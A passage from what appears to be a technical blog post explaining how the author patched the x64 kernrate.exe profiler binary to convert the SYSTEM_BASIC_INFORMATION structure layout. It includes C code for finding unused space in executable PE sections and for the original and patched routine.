However, since there was only one place where the SYSTEM_BASIC_INFORMATION structure was actually retrieved (and even more, it was in an isolated, dedicated function), there was another option: Patch in some code to retrieve the 3790.1830/x64 version of SYSTEM_BASIC_INFORMATION, and then convert it to appear to kernrate as if it were actually the 3790.0/x64 layout. Unfortunately, a change like this involves adding new code to an existing binary, which means that there needs to be a place to put it. Normally, the way you do this when patching a binary on-disk is to find some padding between functions, or at the end of a PE section that is marked as executable but otherwise unused, and place your code there. For large patches, this may involve “spreading” the patch code out among various different “slices” of padding, if there is no one contiguous block that is long enough to contain the entire patch.
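
As an aside, locating that sort of padding is easy enough to do programmatically; the following rough sketch (my own illustration, not part of kernrate or the patch) maps a PE file from disk and reports the slack at the end of each executable section:

#include <windows.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    HANDLE                file, mapping;
    PUCHAR                base;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt;
    PIMAGE_SECTION_HEADER sec;
    WORD                  i;

    if (argc < 2)
        return 1;

    /* Error handling largely omitted for brevity. */
    file    = CreateFileA(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL,
                          OPEN_EXISTING, 0, NULL);
    mapping = CreateFileMappingA(file, NULL, PAGE_READONLY, 0, 0, NULL);
    base    = (PUCHAR)MapViewOfFile(mapping, FILE_MAP_READ, 0, 0, 0);

    dos = (PIMAGE_DOS_HEADER)base;
    nt  = (PIMAGE_NT_HEADERS)(base + dos->e_lfanew);
    sec = IMAGE_FIRST_SECTION(nt);

    for (i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++)
    {
        if (!(sec->Characteristics & IMAGE_SCN_MEM_EXECUTE))
            continue;

        /* Bytes past VirtualSize but within SizeOfRawData are present in
           the file yet unused by the image, making them patch candidates. */
        if (sec->SizeOfRawData > sec->Misc.VirtualSize)
        {
            printf("%-8.8s: %lu slack bytes at file offset 0x%08lX\n",
                   (const char *)sec->Name,
                   (unsigned long)(sec->SizeOfRawData - sec->Misc.VirtualSize),
                   (unsigned long)(sec->PointerToRawData + sec->Misc.VirtualSize));
        }
    }

    UnmapViewOfFile(base);
    CloseHandle(mapping);
    CloseHandle(file);
    return 0;
}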

In this case, however, because the routine to retrieve the SYSTEM_BASIC_INFORMATION structure was a dedicated, isolated routine, and because it had some error handling code for “unlikely” situations (such as failing a memory allocation, or failing the NtQuerySystemInformation(…SystemBasicInformation…) call, although it would appear the latter is not quite so “unlikely” in this case), a different option presented itself: dispense with the error checking, most of which would rarely be used in a realistic situation, and use the extra space to write in some code to convert the structure layout to the version expected by kernrate 3790.0. Obviously, while not a completely “clean” solution per se, the idea does have its merits when you’re already in patch-the-binary-on-disk land (which pretty much rules out the idea of a “clean” solution altogether at that point).

The structure conversion is fairly straightforward code, and after a bit of poking around, I had a version to try out. Lo and behold, it actually worked; it turns out that the only thing that was preventing the prerelease 3790.0/x64 kernrate from doing basic kernel profiling on production x64 kernels was the layout of the SYSTEM_BASIC_INFORMATION structure.

For those so inclined, the patch I created effectively rewrites the original version of the function, which is shown below as translated to C:

PSYSTEM_BASIC_INFORMATION_3790
GetSystemBasicInformation(
 VOID
 )
{
 PSYSTEM_BASIC_INFORMATION_3790 Sbi;
 NTSTATUS                       Status;

 Sbi = (PSYSTEM_BASIC_INFORMATION_3790)malloc(
  sizeof(SYSTEM_BASIC_INFORMATION_3790));

 if (!Sbi)
 {
  fprintf(stderr, "Buffer allocation failed"
   " for SystemInformation in "
   "GetSystemBasicInformation\\n");
  exit(1);
 }

 if (!NT_SUCCESS((Status = NtQuerySystemInformation(
  SystemBasicInformation,
  Sbi,
  sizeof(SYSTEM_BASIC_INFORMATION_3790),
  0))))
 {
  fprintf(stderr, "NtQuerySystemInformation failed"
   " status %08lx\\n",
   Status);
  free(Sbi);

  Sbi = 0;
 }

 return Sbi;
}

Conceptually represented in C, the modified (patched) function would appear something like the following (note that the error checking code has been removed to make room for the structure conversion logic, as previously mentioned; the substantive new addition is the field-by-field structure conversion at the end):

(Note that the patch code was not compiler-generated and is not truly a function written in C; below is simply how it would look if it were translated from assembler to C.)

PSYSTEM_BASIC_INFORMATION_3790
GetSystemBasicInformationFixed(
 VOID
 )
{
 PSYSTEM_BASIC_INFORMATION_3790 Sbi;
 PSYSTEM_BASIC_INFORMATION      SbiReal;

 Sbi     = (PSYSTEM_BASIC_INFORMATION_3790)malloc(
  sizeof(SYSTEM_BASIC_INFORMATION_3790));
 SbiReal = (PSYSTEM_BASIC_INFORMATION)Sbi;

 NtQuerySystemInformation(
  SystemBasicInformation,
  SbiReal,
  sizeof(SYSTEM_BASIC_INFORMATION),
  0);

 Sbi->NumberOfProcessors           =
  SbiReal->NumberOfProcessors;
 Sbi->ActiveProcessorsAffinityMask =
  SbiReal->ActiveProcessorsAffinityMask;
 Sbi->MaximumUserModeAddress       =
  SbiReal->MaximumUserModeAddress;
 Sbi->MinimumUserModeAddress       =
  SbiReal->MinimumUserModeAddress;
 Sbi->AllocationGranularity        =
  SbiReal->AllocationGranularity;
 Sbi->HighestPhysicalPageNumber    =
  SbiReal->HighestPhysicalPageNumber;
 Sbi->LowestPhysicalPageNumber     =
  SbiReal->LowestPhysicalPageNumber;
 Sbi->NumberOfPhysicalPages        =
  SbiReal->NumberOfPhysicalPages;

 return Sbi;
}

(The structure can be converted in-place due to how the two versions are laid out in memory; the “expected” version is larger than the “real” version (and more specifically, the offsets of all the fields we care about are greater in the “expected” version than the “real” version), so structure fields can safely be copied from the tail of the “real” structure to the tail of the “expected” structure.)
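
As a sanity check on that claim, the offset relationship can be verified at compile time with something like the following (this assumes the two structure definitions shown earlier in the post are in scope; CHECK_FIELD is just an illustrative helper):

#include <windows.h>
#include <stddef.h>

/* Assumes the SYSTEM_BASIC_INFORMATION_3790 and SYSTEM_BASIC_INFORMATION
   definitions shown earlier in the post have been pasted in above. */

/* Fails to compile if the "expected" (3790.0) offset of a field is ever
   smaller than the "real" (3790.1830) offset, which is the property that
   makes the tail-to-head in-place conversion safe. */
#define CHECK_FIELD(f)                                       \
    typedef char check_##f[                                  \
        (offsetof(SYSTEM_BASIC_INFORMATION_3790, f) >=       \
         offsetof(SYSTEM_BASIC_INFORMATION, f)) ? 1 : -1]

CHECK_FIELD(NumberOfPhysicalPages);
CHECK_FIELD(LowestPhysicalPageNumber);
CHECK_FIELD(HighestPhysicalPageNumber);
CHECK_FIELD(AllocationGranularity);
CHECK_FIELD(MinimumUserModeAddress);
CHECK_FIELD(MaximumUserModeAddress);
CHECK_FIELD(ActiveProcessorsAffinityMask);
CHECK_FIELD(NumberOfProcessors);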

If you find yourself in a similar bind, and need a working kernrate for x64 (until Microsoft puts out a new version that is compatible with production x64 kernels, if that ever happens), I’ve posted the patch (assembler, with opcode diffs) that I made to the “amd64” release of kernrate.exe from the 3790.0 DDK. Any conventional hex editor should be sufficient to apply it (as far as I know, third parties aren’t authorized to redistribute kernrate in its entirety, so I’m not posting the entire binary). Note that DDKs after the 3790.0 DDK don’t include any kernrate for x64 (even the prerelease version, broken as it was), so you’ll also need the original 3790.0 DDK to use the patch. Hopefully, we may see an update to kernrate at some point, but for now, the patch suffices in a pinch if you really need to profile a Windows x64 system.